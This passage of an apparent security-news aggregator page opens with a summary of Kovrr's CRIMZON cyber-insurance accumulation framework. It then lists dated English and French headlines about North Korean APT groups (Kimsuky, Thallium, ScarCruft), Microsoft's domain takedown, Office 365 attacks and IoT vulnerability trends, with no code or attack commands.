concentration when adding the additional elements of the CRIMZON, entity size and industry to the analysis. The research shows that companies within the same CRIMZON have the tendency to use the same service providers and technologies, and that different compositions of service providers and technologies can be found across CRIMZON. When trying to estimate accumulations of potential losses from cyber, insurance and reinsurance companies face two main challenges: identifying which policies are exposed to the same cyber events and determining how many policies will be affected at the same time. The former is related to the problem of enumerating all technologies and service providers each insured relies upon, the latter is equivalent to estimating the footprint of a cyber event. Analyzing accumulations by CRIMZON enables risk professionals to make sense of the size and extent of potential losses from cyber, without necessarily needing to collect detailed information about technologies and service providers for each insured. The framework is completely agnostic to the line of business, therefore unlocking a full range of possible applications across both silent and affirmative cyber coverages. Among these applications is the development of aggregate models. This research shows it is possible to estimate the two key ingredients needed for the development of industry loss curves, the hazard and the exposure, using the CRIMZON as the atomic unit of aggregation. By identifying the correlation across CRIMZON, an aggregate model can then be developed.âIntroduction - What are CRIMZONâ¢? The Cyber Risk Accumulation Zones (CRIMZONâ¢) framework defines the minimal elements needed to provide a view of aggregated cyber exposure. Kovrr launched CRIMZON during participation in the fourth cohort of the Lloydâs Lab, the insurance technology accelerator operated by Lloydâs of London. CRIMZON is an open framework created to facilitate better communication across players in the cyber insurance value chain. The framework allows users to overlay their data pertaining to loss, cyber attack frequency, as well as additional data onto the CRIMZON for additional insights of risk per zone and to detect correlations between different zones. The framework was created to support efforts for setting a standard for data collection for cyber risk management.The CRIMZON are composed of the following three elements:Location - country-level worldwide a | Vulnerability Studies Cloud | ★★★ | |
|
2020-11-03 03:49:37 | New Kimsuky Module Makes North Korean Spyware More Powerful (lien direct) | A week after the US government issued an advisory about a "global intelligence gathering mission" operated by North Korean state-sponsored hackers, new findings have emerged about the threat group's spyware capabilities.
The APT - dubbed "Kimsuky" (aka Black Banshee or Thallium) and believed to be active as early as 2012 - has been now linked to as many as three hitherto undocumented malware, |
Threat Cloud | APT 37 | |
|
2020-11-02 16:40:03 | North Korea-Linked APT Group Kimsuky spotted using new malware (lien direct) | North Korea-linked APT group Kimsuky was recently spotted using a new piece of malware in attacks on government agencies and human rights activists. North Korea-linked cyber espionage group Kimsuky (aka Black Banshee, Thallium, Velvet Chollima) was recently observed using a new malware in attacks aimed at government agencies and human rights activists. The Kimsuky APT […] | Malware Cloud | APT 37 | |
|
2020-09-15 11:22:27 | De nouvelles vulnérabilités permettent de contourner l\'authentification multifacteur de Microsoft 365 (lien direct) | L'authentification multifacteur (MFA) est rapidement devenue une sécurité indispensable pour les applications cloud pendant la pandémie mondiale de Covid-19. Avec l'accélération du télétravail, la demande d'applications basées sur le cloud, telles que les plateformes de messagerie et de collaboration a explosé. The post De nouvelles vulnérabilités permettent de contourner l'authentification multifacteur de Microsoft 365 first appeared on UnderNews. | Cloud | ||
 |
2020-08-18 04:35:04 | US Army report says many North Korean hackers operate from abroad (lien direct) | US Army says many North Korean hackers are actually located outside the hermit kingdom, in countries like Belarus, China, India, Malaysia, and Russia. | Cloud | APT 37 | |
|
2020-07-30 14:00:00 | Obscurci par les nuages: aperçu des attaques du bureau 365 et comment la défense gérée mandiante enquête Obscured by Clouds: Insights into Office 365 Attacks and How Mandiant Managed Defense Investigates (lien direct) |
Avec les compromis par e-mail commerciaux (BECS) ne montrant aucun signe de ralentissement Comprendre les violations du bureau 365 (O365) et comment les enquêter correctement.Ce billet de blog est destiné à ceux qui n'ont pas encore plongé les orteils dans les eaux d'un O365 BEC, fournissant un cours intensif sur la suite de productivité cloud de Microsoft et son assortiment de journaux et de sources de données utiles aux enquêteurs.Nous allons également passer en revue les tactiques d'attaquant courantes que nous avons observées en répondant aux BEC et fournissant un aperçu de la façon dont les analystes de défense gérés mandiants abordent ces
With Business Email Compromises (BECs) showing no signs of slowing down, it is becoming increasingly important for security analysts to understand Office 365 (O365) breaches and how to properly investigate them. This blog post is for those who have yet to dip their toes into the waters of an O365 BEC, providing a crash course on Microsoft\'s cloud productivity suite and its assortment of logs and data sources useful to investigators. We\'ll also go over common attacker tactics we\'ve observed while responding to BECs and provide insight into how Mandiant Managed Defense analysts approach these |
Cloud | ★★★★ | |
 |
2020-04-29 14:00:00 | 6 Best Board Games You Can Play With Friends Over Zoom (Video Chat) (lien direct) | Don't let the Covid-19 quarantine turn you into a hermit. Video chat with some friends and play a game together. | Cloud | APT 37 | |
|
2020-01-03 10:40:14 | Microsoft helps shutter domains run by North Korean cybergang Thallium (lien direct) | A U.S. district court issued an order enabling Microsoft to take over 50 domains used by a North Korea-based cybercrime gang to conduct spear phishing campaigns. Microsoft's Digital Crimes Unit and the Microsoft Threat Intelligence Center took down the domains controlled by a group it named Thallium after researching the malicious actors activity and filing […] | Threat Cloud | APT 37 | |
 |
2019-12-31 02:39:43 | Microsoft élimine 50 noms de domaine exploités par de redoutables hackers nord-coréens (lien direct) | Le groupe Thallium s'en servait pour infiltrer des institutions américaines, japonaises et sud-coréennes. Pour y parvenir, Microsoft a reçu une ordonnance des autorités américaines.  |
Cloud | APT 37 | |
|
2019-12-30 21:57:04 | Microsoft sued North Korea-linked Thallium group (lien direct) | Microsoft sued Thallium North Korea-linked APT for hacking into its customers’ accounts and networks via spear-phishing attacks. Microsoft sued a North Korea-linked cyber espionage group tracked as Thallium for hacking into its customers’ accounts and networks via spear-phishing attacks. The hackers target Microsoft users impersonating the company, according to a lawsuit unsealed Dec. 27 in […] | Cloud | APT 37 | |
|
2019-12-30 21:53:41 | Microsoft takes down 50 domains operated by North Korean hackers (lien direct) | Microsoft takes control of 50 domains operated by Thallium (APT37), a North Korean cyber-espionage group. | Cloud | APT 37 | |
|
2019-12-30 13:01:33 | Microsoft Takes North Korean Hacking Group Thallium to Court (lien direct) | Microsoft sued a cyber-espionage group with North Korean links tracked as Thallium for breaking into its customers' accounts and networks via spear-phishing attacks with the end goal of stealing sensitive information, as shown by a complaint unsealed on December 27. [...] | Cloud | APT 37 | |
|
2019-05-14 12:48:00 | North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal (lien direct) | The North Korea-linked APT group ScarCruft (aka APT37 and Group123) continues to expand its arsenal by adding a Bluetooth Harvester. North Korea-linked APT group ScarCruft (aka APT37, Reaper, and Group123) continues to expand its arsenal by adding a Bluetooth Harvester. ScarCruft has been active since at least 2012, it made the headlines in early February […] | Cloud | APT 37 | |
|
2019-05-13 15:29:00 | North Korea-Linked \'ScarCruft\' Adds Bluetooth Harvester to Toolkit (lien direct) | A North Korea-linked threat group tracked as ScarCruft, APT37 and Group123 continues to evolve and expand its toolkit, Kaspersky Lab reported on Monday. | Threat Cloud | APT 37 | |
|
2018-10-01 11:00:00 | Report Ties North Korean Attacks to New Malware, Linked by Word Macros (lien direct) | Newly discovered malware from the world of cyberespionage connects the dots between the tools and operations of the little-known Reaper group believed to act on behalf of the North Korean government. [...] | Malware Cloud | APT 37 | |
 |
2018-08-15 12:30:04 | July\'s Most Wanted Malware: Attacks Targeting IoT and Networking doubled since May 2018 (lien direct) | Three IoT vulnerabilities entered July's top ten most exploited vulnerabilities list, as threat actors have doubled their attacks on these Mirai and Reaper-related vulnerabilities since May 2018. During July 2018, three IoT vulnerabilities entered the Top 10 most exploited list: MVPower DVR router Remote Code Execution at #5; D_Link DSL-2750B router Remote Command Execution… | Threat Cloud | APT 37 | |
|
2018-08-10 16:15:03 | The analysis of the code reuse revealed many links between North Korea malware (lien direct) | Security researchers at Intezer and McAfee have conducted a joint investigation that allowed them to collect evidence that links malware families attributed to North Korean APT groups such as the notorious Lazarus Group and Group 123. The experts focused their analysis on the code reuse, past investigations revealed that some APT groups share portions of code […] | Malware Medical Cloud | APT 38 APT 37 |
To see everything:
Our RSS (filtrered)
